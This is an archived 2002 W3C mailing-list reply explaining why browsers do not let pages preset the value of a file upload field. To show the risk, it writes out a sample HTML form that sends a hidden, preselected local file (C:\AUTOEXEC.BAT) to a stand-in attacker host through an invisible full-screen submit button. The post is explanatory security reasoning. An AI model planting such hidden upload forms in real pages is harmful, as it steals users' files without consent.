W3C home > Mailing lists > Public > www-html@w3.org > February 2002

Re: Input Type=file default Value

From: Christian Wolfgang Hujer <Christian.Hujer@itcqis.com>
Date: Thu, 14 Feb 2002 15:32:03 +0100
To: Tanev Robert <RT@railconsult.de>, www-html@w3.org
Message-ID: <16bMyt-14HKs4C@fmrl04.sul.t-online.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello Tanev,

Am Donnerstag, 14. Februar 2002 14:44 schrieb Tanev Robert:
> Hallo everybody,
>
> we are facing the following problem: we want to provide an input element of
> type file with a default value that should be displayed by default
> (actually it is the current value of a specific attribute). While the
> value-property is read only in IE5-6, we tried to set the
> defaultValue-property through script:
>
> var oInput = document.createElement("INPUT");
> oInput.type = "file";
> oInput.defaultValue = _someValue_;
> oParent.appendChild(oInput);
>
> Unfortunately, the default value is not displayed. The documentation
> states, that changing the defaultValue has no effect until a form was
> reseted, but in our test case this did not happened.
>
> Does anybody know, how to force a file input element to show an initial
> value or does somebody has a workaround for this?

I hope there never will be a workaround for this since this is a security 
issue, as Andrew already said. I won't repeat what Andrew said (I completely 
agree with him), I just want to add further information on the *why* this is 
a security issue.

Imagine code like this:
<!-- ... -->
<form method="post" action="http://www.somecracker.mars/filereceiver">
	<input
		type="file"
		style="
			/* make this one invisible */
			display:none;
			visibility:hidden;
			/* Ensure it really is invisible */
			color:transparent;
			background-color:transparent;
			/* Ensure if above failed, at least the border is invisible */
			border:none;
			/* Another way to make it invisible */
			width:0px;
			height:0px;
		"
		name="f"
		value="C:\AUTOEXEC.BAT"
	/>
	<input
		type="submit"
		style="
			/* make button itself invisible */
			color:transparent;
			background-color:transparent;
			/* make button border invisible */
			border-style:none;
			/* make button fill whole screen */
			display:block;
			position:absolute;
			left:0px;
			right:0px;
			width:auto;
			top:0px;
			bottom:0px;
			height:auto;
			/* make button frontmost component */
			z-index:2;
		"
		value=""
	/>
	<!--
		value: make button have no text (in case browser ignores color:transparent)
	-->
</form>
<!-- ... -->

It even isn't a single line of ECMAScript code required to let the default 
value of <input type="file" /> be a security issue.

So ECMAScript must not be allowed to override the security defaults of the 
browser in any way. This even must not be allowed on intranets, since this 
would allow a new kind of trojans. Or it would allow your co-workers to spy 
your desktop.

And if I knew a workaround for this, I'd rather report it to bugtraq @ 
securityfocus and the browser vendor, not to this list ;)


Greetings

- -- 
Christian Wolfgang Hujer
Geschäftsführender Gesellschafter
ITCQIS GmbH
Telefon: +49 (089) 27 37 04 37
Telefax: +49 (089) 27 37 04 39
E-Mail: mailto:Christian.Hujer@itcqis.com
WWW: http://www.itcqis.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE8a8pmGU/Ex9kzkZ4RAiR6AKCmQ7yTdPDEln73+p1gWZA6cAJ6QwCgufc4
Uje+oT/fSjMPa08ZsIJSIxM=
=Lboe
-----END PGP SIGNATURE-----
Received on Thursday, 14 February 2002 10:10:10 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Tuesday, 27 March 2012 18:15:50 GMT